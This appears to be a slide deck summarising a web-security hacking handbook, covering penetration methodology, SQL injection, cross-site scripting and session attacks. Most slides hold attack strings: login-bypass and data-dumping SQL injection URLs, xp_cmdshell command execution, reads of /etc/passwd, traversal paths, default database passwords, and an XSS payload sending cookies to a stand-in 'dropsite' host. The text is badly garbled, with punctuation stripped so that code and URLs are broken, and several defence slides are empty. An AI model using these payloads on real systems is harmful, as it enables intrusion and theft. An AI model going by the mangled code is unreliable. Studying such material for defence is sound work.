HACKNOTES - Web Security

1
HACKNOTES - Web Security

• Mike Shema
• McGraw-Hill/Osborne

2
PART IHacking Techniques Defenses

1. Web Hacking Penetration Methodologies
2. Critical Hacks Defenses

3
1 Web Hacking Penetration Methodologies

• Threats and Vulnerabilities
• Profiling the Platform
• Profiling the Application
• Summary

4
THREATS AND VULNERABILITIES

• Vulnerabilities
• The platform Linux, Windows, Apache, Oracle
• The application programming errors
• SQL injection
• Session hijacking

5
PROFILING THE PLATFORM

• Web Server Apache, IIS, Netscape
• Application Server Tomcat Servlet, PHP, ASP.NET
• Database Oracle, MSSQL, DB2, Infomix, Sybase.

6
Port Scanning and Service Identification

• Nmap

7
Port Scanning and Service Identification

• Scanline fast but only perform SYN, ICMP and
  UDP scans

8
Port Scanning and Service Identification

• Netcat openssl

openssl s_client connect website443 cipher
EXPORT40 openssl s_client connect website443
cipher NULL openssl s_client connect
website443 cipher HIGH
9
Vulnerability scanning

• Nikto Nessus

10
Platform profile checklist

1. Identify the servers role
2. Determine the operating system and version
3. Determine the operating system and application
   patch level
4. Scan for open ports
5. Record the web server type, patch level, and
   additional components
6. Research known vulnerabilities.

11
PROFILING THE APPLICATION

• The next step is to profile the actual web site
  by systematically cataloging all of its pages,
  functions, and parameter.
• To identify common problems such as poor input
  validation, inadequate session handling, and
  other programming errors.

12
Enumerate the Directory Structure and Files

• Indexex, The easy part is going through the
  application and recording each file name and its
  full path from the web root.
• Teleport, wget
• libwhiskers crawl function

13
Identify Authentication Mechanism
Keep in mind that challenge/response
mechanisms dont protect passwords with 100
percent security
Anonymous No authentication required
HTTP Basic Username and password and passed in a header that is Base64 encoded of the type base64 (usernamepassword)
HTTP Digest Username and password are passed in a header that is and MD5 challenge/response.
HTTP NTLM Username and password use Windows credentials passed in a challenge/response format
Form-based Username and password are entered in a form. The user receives some token (cookie value, session ID, etc.) that indicate success.
14
Identify Authorization Mechanism

• Identify Authorization Tokens

User URL
Matt https//website/index.php?idmattisadminfalsemenubasic
Allen https//website/index.php?idallenisadminfalsemenufull
George https//website/index.php?idgeorgeisadmintruemenubasic
Scott https//website/index.php?idscottisadmintruemenufull

• http//website/index.php?idallenisadminfalseme
  nubasic
• If the request succeeds, then the application is
  vulnerable to
• horizontal privilege escalation.
• http//website/index.php?idgeorgeisadminfalsem
  enubasic
• If the request doesnt receive administrator
  right, then user impersonation still works,
• but the server tracks authorization in a
  parameter other than id.
• Otherwise, the application performs the
  authorization check based on the username,
• is vulnerable to horizontal and privilege
  escalation.

• http//website/index.php?idmattisadmintruemenu
  full
• if the request succeeds, then the application is
  vulnerable to
• vertical privilege escalation. The attack
  required manipulating multiple tokens,
• but the application still failed to enforce
  strong authorization checks.

• http//website/index.php?idmattisadminfalsomen
  ufull
• if the request succeeds, then the application is
  vulnerable to
• vertical privilege escalation. The application
  doesnt perform any authorization
• checks after the user has authenticated.

• http//website/index.php?idmattisadmintruemenu
  basic
• If the request succeeds, then application is
  vulnerable to vertical privilege escalation.
• The application performs an authorization check
  on the isadmin parameter and
• provides functionality according to the a value.

15
Protect Authorization

• The best defense is to track as many user
  attributes on the server as possible.
• Creating role-based access in a custom database
  table increases application overhead and
  maintenance however, the security requirements
  of the application may require such a technique.

16
Identify All Support Files

• style sheets (.css)
• IIS files that are interpreted by specific ISAPI
  (internet server application programming
  interface) filters, such as .htr, .htx, .idc ,
  .ida and .idq.
• passwd.txt global.asa
• Nikto will identify these common files, but only
  in default locations.

17
Identify All Include Files

• To identify an include file by search for the
  Server Side Include (SSI) tag.
• Virtual
• File
• PHP
• Log

lt!-- include virtual /html/include
/header.inc --gt
lt!-- include file include/header.inc --gt
18
Protect Include Files

• Always use the languages file suffix instead of
  .inc when naming include files.
• If youre using ApacheASP, then you can either
  rename the files to .asp or modify the httpd.conf
  file
• The ltFilesMatchgt trick

lt This line will not be visible if the file
suffix is .asp gt lt! This line will be visible
regardless of the file suffix --gt
19
Enumerate All Forms

• The indicator of a form is the HTML ltformgt tag
  how ever, the salient portions are the input
  type definitions
• Form-based authentication is also a primary
  target for brute-force password-guessing attacks.

ltINPUT TYPEhidden NAMEsess_id VALUE
gt from APBoard ltINPUT TYPEhidden
NAMEpostit VALUETRUEgt ltINPUT TYPEhidden
NAMEinsertinto VALUE1gt ltINPUT TYPEhidden
NAMEBoardID VALUE1gt ltINPUT CLASSbutton
TYPEsumit NAMEnew_topic VALUEThema
postengt ltINPUT CLASSbutton TYPEsumit
NAMEprefiew_topic VALUEVorschaugt
20
Enumerate All GET Parameters

• Many applications track variables through URL
  parameters. The server sets these parameters
  based on user permission level, a users action,
  a session ID, or similar function.
• This can point to the parameters function or its
  relation to session tracking, or it can generate
  informational errors.
• Each GET parameter should also be tested for
  input validation and SQL injection attacks

http//website/main.asp?menuviewprofile
viewprofile, user, welcome, admin, debug
21
Protect Parameters

• If the application uses GET parameters to track
  values then you might consider using POST request
  more often.
• The parameters to a POST request will not show up
  in a browsers history file or bookmarks.

22
Identify Vector forDirectory Attacks

• Directory attacks traversal and listing
• Applications that use templating techniques
• Typical attack
• NULL (00) character
• Try this to bypass scripts that check for file
  extensions or automatically append characters to
  file names.

• http//website/cgi-bin/bb-hostsvc.sh?HOSTSVCwww,w
  ebsite,com.cpu
• http//website/servlet/webacc?User.htmlindex
• http//website/ultraboard.pl?actionPrintableTopic
  Post42

• ../../../../etc/passwd
• ../../conf/httpd.conf
• ../../../../boot.ini
• ../../../../winnt/repair/sam

../../etc/paswd00html
23
Identify Areas that ProvideFile Upload Capability

• File upload introduces several threats to the
  application
• Malicious Content
• File Overwrite
• Denial of Service

24
Identify Errors

• Two steps
• Simply try to generate some errors in the
  application.
• Identify what types of errors are generated on
  the server and how they are displayed to user.

Inserting garbage characters deleting
parameters inserting punctuation
Did it return the servers default HTTP 500
message? Is it a customized error page? Does an
error return a custom page, but an HTTP 200
message? What information does the error
contain? Can you identify path information? What
about internal variables or references to other
files? Is the error related to SQL queries?
25
Protect Error Messages

• Errors can be caught in two locations
• The web or application server
• Change the content of these pages so that it does
  not include any server or application
  information.
• The application itself
• Make sure that the application has proper
  error-handling routines that default to a simple,
  innocuous error message.

26
Determine Which PagesRequire SSL

• Replace all of the https// references with
  http// and see if the application still serves
  the page.
• The server and application should be designed to
  ensure that sensitive files are transmitted via
  SSL.

27
Applicatoin Profile Checklist
Step
Harvest the web site
Enumerate the directory structure and files
Identify authentication mechanism
Identify authorization mechanism
Identify all support files
Identify all include files (.inc, .js, global.asa)
Enumerate all forms (typehidden typepassword)
Enumerate all GET parameters (?name1value1)
Enumerate the effect of absent GET parameters (?name1value1)
Identify vectors for directory traversal attacks
Identify areas that provide file upload capability
Identify errors
Determine which pages require SSL
28
SUMMARY

• In order to full vet the security of an
  application, it must first be fully profiled.
• This basically involves gathering as much
  information about the platform and the
  application.
• A good profile of the application and knowledge
  of SQL can turn an innocuous error into a severe
  exploit.

29
2 Critical Hacks Defenses

• Generic Input Validation
• Character Encoding
• Alternate Request Methods
• SQL Injection
• Cross-site Scripting
• Token Analysis
• Session Attacks
• XML-Based Services
• Fundamental Application Defenses
• Input Validation
• Summary

30
GENERIC INPUT VALIDATION

• Common input validation tests

Characters Characters URL Escape URL Escape Comments
NULL NULL (empty) (empty) Remove the parameter from URL or POST request. Use this to check error handling.
NULL NULL 00 00 Insert a NULL character within a parameter or at the end of a string. Use 00 to bypass file name-validation routines ( an application may allow a variable to contain NULL characters, but the underlying operating system uses the NULL to terminate a string).
Line Feed Carriage Return 0a 0d Use these for arbitrary command execution, command separation, and parsing errors.
7-bit maximum 8-bit maximum 7f ff Use these to test the applications handling of potential byte-field overflows.
Extended ASCII (value 0x80) Extended ASCII (value 0x80) c1 e1 c1 e1 Use these to test for potential wraparound errors. Add 0x80 (128) to any ASCII character and see what the application accepts and displays.
27 27 Use this to test for SQL injection vulnerabilities.
3b 3b Use this for command execution and command separation on Unix-based systems.
31
GENERIC INPUT VALIDATION

• Common input validation tests (cont.)

Characters Characters Characters Characters Characters URL Escape URL Escape URL Escape URL Escape URL Escape Comments
7c 7c 7c 7c 7c Use this for command execution and execution and redirection on Unix-based systems.
26 2626 2626 2626 2626 Use this for command execution (background a process) on Unix-based systems. Double to windows systems.
( ) -- 28 29 2b 2d2d 3d Use these SQL statement components to craft SQL injection attacks
../ ../ ../ ../ ../ 2e2e2f 2e2e2f 2e2e2f 2e2e2f 2e2e2f Use this for directory traversal attacks.
ltscriptgt ltscriptgt ltscriptgt ltscriptgt ltscriptgt 3cscript3e 3cscript3e 3cscript3e 3cscript3e 3cscript3e Use this for cross-site scripting tests in fields that the application redisplays to the user.
Underflow Underflow Underflow Underflow Underflow Varies Varies Varies Varies Varies Enter too few characters for the field.
Overflow Overflow Overflow Overflow Overflow Varies Varies Varies Varies Varies Enter too many characters for the field.
32
Common Vectors
Consider these vector as well
GET requests POST requests Session cookies Stateful cookies HTTP headers
User-Agent Host Content-Type Referer WebDAV options
Request portion Attack possibilities
GET What happens if the request is submitted with a POST? Get vs. GET What about other verbs? (PUT, DELETE, TRACE, etc.)
/menu.cgi /.(possible directory listing) /menu.cgi00 (possible source disclosure) /menu.cgi.bak
?foobar ?foobar Replace bar with any item
HTTP/1.1 HTTP/1.0 HTTP/2.0 (invalid protocol)
Host Host localhost Host aaaaaa (larget nubmer of letters)
Example input Validation attack vectors
33
Source Disclosure

• Certain input validation attacks manipulate the
  CGIs file name in order to cause its source to
  be displayed in a users browser.
• Java-based server engines seem to be most
  vulnerable to this type of validation attack
• /foo.jsP
• /foo.js70
• /3f.jsp (directory listing)
• /foo.aspDATA
• /foo.asp.html

34
CHARACTER ENCODING

• URL Encoding (Escaped Characters)
• Unicode

Alphanumeric a-z A-Z 0-9
Reserved / ? _at_ ,
Marks - _ . ! ( )
Space 0x20
Delimiters lt gt
Unwise \
Mask 1 1 0 0 0 0 b7 b6 1 b6 b5 b4 b3 b2 b1 b0
---- first byte ------ ---- second byte
--- Example 0 0 1 0 1 1 1 1 (2F)
b7 b6 b5 b4 b3 b2 b1b0
------ one byte --------- Result 1 1 0 0 0 0 0
0(C0) 1 0 1 0 1 1 1 1(AF) In url c0af
Microsoft Bulletin MS00-0086
http//website/scripts/..c0af..c0afwinnt/system32/cmd.exe?/cdir
Parsed by IIS
http//website/scripts/../../winnt/system3/cmd.exe?/cdir
Recorded in IIS logs
/scripts/..À../winnt/system32/cmd.exe?/cdir
35
Some Useful Unicode-Encoded Characters
Character ASCII Value Hex Unicode Representation (11) Unicode Multibyte Representations Unicode Representation (11) Unicode Multibyte Representations Unicode Representation (11) Unicode Multibyte Representations Unicode Representation (11) Unicode Multibyte Representations
/ 0x2F C02F C02F C0AF C0AF
\ 0x5C C05C C11C C11C C19C
lt 0x3C C03C C03C C0BC C0BC
gt 0x3E C03E C03E C0BE C0BE
' 0x27 C027 C027 C0A7 C0A7
( 0x28 C028 C028 C0A8 C0A8
) 0x29 C029 C029 C0A9 C0A9
, 0x2C C02C C02C C0AC C0AC
0x7C C07C C07C C0FC C0FC
0x2A C02A C02A C0AA C0AA
. 0x2E C02E C02E C0AE C0AE
36
ALTERNATE REQUEST METHODS

• SPIKE proxy
• http//www.immunitysec.com/resources-freesoftware.
  shtml
• GET, POST, BROWSE, CONNECT, COPY, DELETE, HEAD,
  LOCK, MKCOL, MOVE, OPTIONS, PROPFIND, RPOPPATCH,
  PUT, SEARCH, TRACE, and UNLOCK.

37
SQL INJECTION
URL HTTP.GetFromUser() user_id
URL.parameter(user_id) password
URL.parameter(password) query SELECT name
FROM userlist WHERE uid user_id AND
pwd password database.connect() resul
t databasae.execute(query) if
resule HTTP.Send(Login successful. Welcome,
result) IsAuthenticated true else
HTTP.Send(User ID or password is
incorrect.) isAuthenticated false end if if
IsAuthenticated HTTP.Send(MainMenu) end if
https//website/login.cgi?user_iddcooperpassword
diane
https//website/login.cgi?user_iddcooper20--
38
SELECT Statement Manipulation

• https//website/login.cgi?user_iddcooperpassword
  20OR203d
• https//website/login.cgi?user_iddcooperpassword
  foo20OR2013d1
• https//website/login.cgi?user_id20OR203d
  password20OR203d
• https//website/login.cgi?user_id25--

SELECt name FROM userlist WHERE uiddcooper AND
pwd OR
SELECT name FROM userlist WHERE uiddcooper AND
pwdfoo OR 11
SELECT name FROM userlist WHERE uid OR
AND pwd OR
SELECT name FROM userlist WHERE uid -- AND
pwd
39
Retrieve Arbitrary Data with SELECT plus UNION

• SELECT value(s) FROM table WHERE clause_false
  UNION ALL SELECT value(s) FROM other_table WHERE
  clause_true

https//website/login.cgi?user_idfoopasswordU
NION ALLSELECTuid,pwdFROMuserlistWHERE3d

SELECT name FROM userlist WHERE uidfoo AND
pwd UNION ALL SELECT uid, pwd FROM userlist
WHERE
https//website/login.cgi?user_idfoopassword27
UNIONALL SELECTfirst5fname2clastfname2ccca
rdFROMstore WHERE27273d2727
SELECT name FROM userlist WHERE uidfoo AND
pwd UNION ALL SLEECT first_name,last_name,ccard
FROM store WHERE
SELECT name FROM userlist WHERE uidfoo AND
pwdbar UNION ALL SELECT first name, last name,
ccard FROM store WHERE 11
40
Use INSERT to Modify Data

• INSERT INTO user (User,Password) VALUES
  (albert,camus)

https//website/login.cgi?user_idpassword27I
NSERTINTOuserlist 28uid2cpassword29VALUES2
827albert272c27camus2729--
SELECT name FROM userlist WHERE uid AND
pwd INSERT INTO userlist (uid,password)
VALUES (albert,camus)--
41
Salient Information for Common Databases
Server Default Accounts View Users Useful Variables
Microsoft SQL Server sa / ltblankgt EXEC master..sp_who2 EXEC master..xp_loginconfig SELECT FROM sysusers SELECT FROM syslogins EXEC xp_msver _at__at_servername _at__at_version
MySQL root / ltblankgt monty / some_pass Some SELECT host,user,password FROM user SHOW VARIABLES _at__at_version
Oracle internal / oracle oracle / oracle Scott / tiger sys / Change_on_install system / manager SELECT A.USERNAME, A.PASSWORD FROM SYS.DBA_USERS A SHOW PARAMETERS
PostgreSQL postgreSQL / ltlockedgt must be defined SELECT FROM pg_shadow SELECT FROM pg_group
42
Common SQL Injection String
Raw String URL Encoded Version Effect
27 Initial test. If this generates an error, then the application is vulnerable to SQL injection.
25 2525 Represents a wildcard. Can be used to retrieve multiple rows as opposed to a single value.
-- -- 273b2d2d 3b2d2d SQL comment. Use this to truncate a statement so that further SQL syntax within the statement is ignored.
OR 2720OR27273d27 Creates a true statement.
OR11 OR13d1 20OR20120 20OR2013d20 Creates a true statement. User this when the query does not have single quote () delimiters.
foo) Foo29 May generate errors in Oracle-based applications.
43
SQL Injection Countermeasures

• Use strongly typed variables and database column
  definitions.
• Assign query results to a strongly typed
  variable.
• Limit data lengths.
• Avoid creating queries via string concatenation.
• Apply data separation and role-based access
  within the database.

http//website/votw/analysis.asp?voteid_at__at_version
Microsoft OLE DB Provider for SQL Server error
80040e57 Arithmetic overflow error converting
nvarchar to data type numeric. /vote/analysis.asp,
line 19
SELECT something FROM table WHERE varable
44
Microsoft SQL Server

• Insert a single quote () into URL parameters and
  then examine the output, HTML source, or even the
  URL parameters for a tell-tale sign.
• In addition to the slew of attacks that can be
  performed against any SQL-based database, MSSQL
  server contains a set of very powerful and
  dangerous commands.

EXEC master.xp_cmdshell command
https//website/vuln.cgi?paramxp_cmdshellipco
nfig/all--
45
High-Risk Stored Procedures in MSSQL
Stored Procedure Description
sp_validatelogins Enumerates users who may still access the database, but are no longer part of a group or domain known to the database
sp_who2 user Enumerates database user information. Note that these are users with access to SQL database itself. Application users must be gathered from the custom tables created for the application
xp_loginconfig Enumerates login information, login mode, and default user.
xp_msver Lists database version and operating system information.
xp_ntsec_enumdomains Enumerates domains present on the network
xp_regread ltrootkeygt,ltkeygt,ltvaluegt Reads a registry key from the Hive.
xp_servicecontrol ltactiongt,ltservicegt Performs an action (START or STOP) on a Windows service
xp_terminate_process ltPIDgt While it does not provide a simple method for identifying a process name, this can quickly lead to a denial of service.
46
Useful Objects and Variables
Variables SELECT _at__at_variable
_at__at_language Name of the language currently in use.
_at__at_microsoftversion Numeric value that represents the version and patch level.
_at__at_servername Host name of the database.
_at__at_servicename Name of the Windows service under which the database is running
_at__at_version Date, version, and processor type. Use xp_msver to extract more information.
System Table Objects SELECT FROM table
Systemcolumns All column names and stored procedures within the database.
Sysfiles File name and path for the current database and its log file.
Sysobjects Every object contained in the database.
Systypes Default and user-defined data types.
Sysusers All users who can manipulate the database.
Master Database Tables SELECT FROM master..table
Sysconfigures Current database configuration settings.
Sysdevices Devices used for database, logs, and temporary files.
Syslogins Information for each user permitted to access the database.
Sysservers All peers that the server can access as an OLE database server.
47
Oracle
Informational Oracle parameters
Parameter Description
control_files Example E\oracle\ora92\orcl\control01.ctl, E\oracle\ora92\orcl\control02.ctl, E\oracle\ora92\orcl\control03.ctl
db_name Example orcl
mts_service Example orcl
user_dump_dest E\oracle\admin\orcl\udump
utl_file_dir Default ltblankgt The default directory when writing files with the utl_file command.
show parameters control_files
CREATE DIRECTORY somedir AS /path/to/dir CREATE
TABLE foo (bar varchars2(20)) ORGANIZATION
EXTERNAL (TYPE oracle_loader DEFAULT DIRECTORY
somedir LOCATION (somefile.dat))
DECLARE fh UTL_FILE.FILE_TYPE BEGIN fh
UTL_FILE.fopen(/some/dir,file.name,W) --
wite UTL_FILE.PUTF(fh, somedata) UTL_FILE.FCLOSE(
fh) END
48
MySQL Read from the File System
mysqlgt CREATE TABLE foo (bar TEXT) Query OK, 0
rows affected (0.02 sec) mysqlgt LOAD DATA INFILE
/etc/passwd INTO TABLE foo Query OK, 27 rows
affected (0.02 sec) Records 27 Deleted 0
Skipped 0 Warnings 0 mysqlgt SELECT FROM foo
bar ----------------------------------------------
----------------------- rootx00root/root/bin
/bash mikex500500mike/home/mike/bin/bash mys
qlx7878MySQL server/var/lib/mysql/bin/bash p
ostgresx7979system user/var/lib/pgsql/bin/ba
sh
https//website/vuln.cgi?param27CREATETABLEf
oo28barTEXT29 https//website/vuln.cgi?param
27LOADDATAINFILE272fetc2fpasswd27INTOT
ABLEfoo https//website/vuln.cgi?param27SELE
CT2aFROMfoo
49
MySQL Write to the File System
Create a DoS By taking up disk space
SELECT FROM employees INTO OUTFILE /tmp/foo
https//website/vuln.cgi?param27SELECT2aFRO
M employeesINTOOUTFILE272ftmp/2f..0827
melnibone ls la /tmp drwxrwxrwx 8 root
root 4096 jan 16 1628 . drwxrwxrwx 19 root
adm 4096 jan 16 1403 .. drwxrwxrwx 1 mysql
mysql 1269 jan 16 1628 ..
melnibone ls la /tmp cat -tve drwxrwxrwx
8 root root 4096 jan 16 1628
./ drwxrwxrwx 19 root adm 4096 jan 16
1403 ../ drwxrwxrwx 1 mysql mysql 1269 jan
16 1628 ..H
50
PostgreSQL File Read/Write Access with COPY
test CREATE TABLE foo (bar TEXT) CREATE test
COPY foo FROM /etc/passwd COPY test SELECT
FROM foo bar ----------------------------------
----------------------------------- rootx00roo
t/root/bin/bash mikex500500mike/home/mike/
bin/bash mysqlx7878MySQL server/var/lib/mysql
/bin/bash postgresx7979system
user/var/lib/pgsql/bin/bash (27 rows) test
COPY foo FROM /var/lib/pgsql/data/pg_hba.conf
COPY foo TO /var/lib/pgsql/data/pg_hba.conf COP
Y foo TO /tmp/table_data COPY pg_shadow TO
/tmp/foo
51
MySQL PostgreSQL Protect the File System

• Running the application in a low-privilege
  account.
• Limits the exposure of important system
  configuration files and binaries.
• chroot or jail environments.
• Protect system files.

52
Putting It Together

• Identify a vulnerable parameter. Test basic SQL
  injection characters such a 00, 27, and 3b.
  Examine errors for indicators of a SQL injection.
• Examine errors for information on database,
  table, and column names.
• Query standard variable (version, file locations)
  for the type of database.
• Determine system-specific users.
• Determine database-specific users.
• Determine application-specific users.
• Query standard database objects (database,
  tables, columns, stored procedures).
• Record available databases, tables, columns, and
  known row values.
• Query arbitrary data from application tables.
• Use OR TRUETRUE commands to bypass
  authentication.
• Insert arbitrary data into standard database
  tables.
• Insert arbitrary data into application tables.
• Attempt to read and write files on the operating
  system.
• Execute arbitrary commands on the databases host
  operating system
• Send files to an FTP, HTTP, TFTP server or netcat
  listener.
• Write files to the web document root.
• Overwrite important configuration files.
• Denial of service (shutdown the database or host,
  delete files, fill up disk space).

53
CROSS-SITE SCRIPTING
ltscriptgtalert(Hello world!)lt/scriptgt
ltscriptgtalert(document.cookie)lt/scriptgt
ltscriptgtdocument.locationhttp//dropsite/cookiem
onster.cgi?document.cookielt/scriptgt
3cscript3edocument2ecookie3cscript3e
ltdiv stylebackground-imageurl(javascriptalert(
foo))gt ltimg srcjavascriptalert(foo)gt ltimg
dynsrcjavascriptalert(foo)gt
ltimg srcfoo altbar onmouseoverjavascripta
lert(foo)gt
54
TOKEN ANALYSIS
55
Finding Tokens
http//website8000/LOGINsessionid0nexthtml/ P
atronAutho.htmlbadhtml/PatronAutho.htmlentityla
nginit FALSEentitylangengentitynoPatronFALSE
http//website/default.asp?SESSIONID7BFDCECD1C-
835C-46A4-A20D-148AAF056E747D http//website/arti
cle.php3?sid20020303191829 http//website/cust.fl
?rqstcustomerservicesessguest
56
Encode vs. Encrypted

• Base 64

Cookie SXNBZG1pbj1GYWxzZQ
57
Encode vs. Encrypted

• One-Way Hash Algorithms

58
Encode vs. Encrypted

• Encryption

ltinput typehidden nameccard
valueBLk1tCXYv6pEn2jqB6zorQgt
ltinput typehidden nameccard
value8mMbh5LUvwEBa3NJeOwdmggt
59
Pattern analysis
60
SESSION ATTACKS
Token Description Special Attacks
Incremental Value A counter used by the application to track something. this may be a current session, request number, reference to a temporary file, or other ephemeral. It may be numeric or a string. Varies.
Date and Timestamp A special case of incremental values. The timestamp always increases, regardless of new sessions and users. Most of the time it will consist of a long, numeric string or a 10-digit number if it is an epoch value. YYYYMMDDHHMMSSMMDDHHMMSS YYYY Revalidate an old session ID. Bypass forced timeouts.
Static Value A value that does not change regardless of session, user, or time. This could be as simple as a language identifier (1033 for U.S. English) or a specific flag used by the application. Input Validation.
Pseudorandom Value This is most likely the session token. Session hijacking.
Profile Information Look for values that the application has requested such as first name, list name, e-mail address, mailing address, phone number, age, birthday, etc. User impersonation. Access another users information (horizontal privilege escalation).
Server IP Address The server embeds its own IP address in the cookie. The address could be the public IP address or an internal one. Look for four bytes in network order (big endian) or low endian format. Also, check for hexadecimal and Base 64 equivalents. For example, 192.168.0.1 could be either 0x0C0A80001 or 0x00100A8C0. Network enumeration.
Client IP Address The client embeds its own IP address in the cookie. Look for four bytes in network order (big endian) or low endian format. Also, check for hexadecimal and Base 64 equivalents. For example, 192.168.0.1 could be either 0x0C0A80001 or 0x00100a8C0. Session hijakcing
Two-Byte numbers This may be a port number. Test the values to see Network enumeration.
61
SESSION ATTACKS

• Horizontal privilege Escalation
• Vertical Privilege Escalation
• Attacking session management process
• Find the state carrier
• Decipher the state information
• Replay the state information
• Modify the state information

62
User Impersonation
63
Protect URL Parameters
64
Brute-Force Password Guessing
65
Password Protection

• Lock the account after a certain number of failed
  logins
• Re-authentication attempts should have a minimum
  time between them
• Concurrent logins should be restricted
• Inform the user that failed logins have occurred.

66
Spoofing and Replay
http//website/bad.cgi?userfoosessid12345redh
erring
67
Protect the Session
Token Creation Description
timestamp ID Insecure. The timestamp is trivial to modify and update to a vild window. A captured token may be replayed at any time.
3DES (timestamp ID) Secure. The application is able to decrypt the token in order to verify that the timestamp is within the valid window. A captured token may be replayed only within the time window. The token is vulnerable to an offline brute-force attack. For example, if the attacker determines the initial timestamp and session ID, then it would be possible to determine the secret key used by the application to decrypt the token.
3DES(secret timestamp ID) More secure. The addition of the secret or salt makes a successful brute-force attack more difficult because the attacker no longer has a known plaintext (timestamp ID) to target. The secret should be rotated on a periodic basic.
68
Session Correlation

• Success
• Failure
• Error
• Explicit Failure
• Silent Failure
• Re-authenticate
• Success (Horizontal)
• Success (Vertical)

69
XML-BASED SERVICES
lt?xml versoin1.0 encodingUTF-8
?gt ltdefinitions nameSecureContextEstablishmentDe
finition targetNamespacehttp//someplace/authent
ication xmlns http//schemas.xmlsoap.org/wsdl/
xmlnsauth-bindings http//someplace/authenticat
ion/authentication_bindings xmlnssoaphttp//sc
hemas.xmlsoap.org/wsdl/soap/gt ltimport
location../security/authentication/bindings.wsdl
namespacehttp//someplace/authentication/ auth
entication_bindings /gt ltservice
nameSecureContextEstablishmentServicegt ltdocumen
tationgtService used to establish a security
context lt/documentationgt ltport
bindingauth-bindings SecureContextEstablishmen
tSOAPBinding name SecurityContextEstablishment
Portgt ltsoapaddress locationhttp//localhost8
080/services/gt lt/portgt lt/servicegt lt/definitionsgt
70
Attacking XML
POST /foo/ViewProfile HTTP/1.0 Content-Type
text/xml Content-length 95 lt?xml
version1.0?gt ltGetProfilegt ltProfileNamegtMorgainn
elt/ProfileNamegt ltparams/gt lt/Getprofilegt
71
FUNDAMENTAL APPLICATION DEFENSES
72
INPUT VALIDATION
73
INPUT VALIDATION Perl Regex
74
INPUT VALIDATION .NET Regex Token
75
Directory Traversal and File Handling
76
Output Validation
77
SUMMARY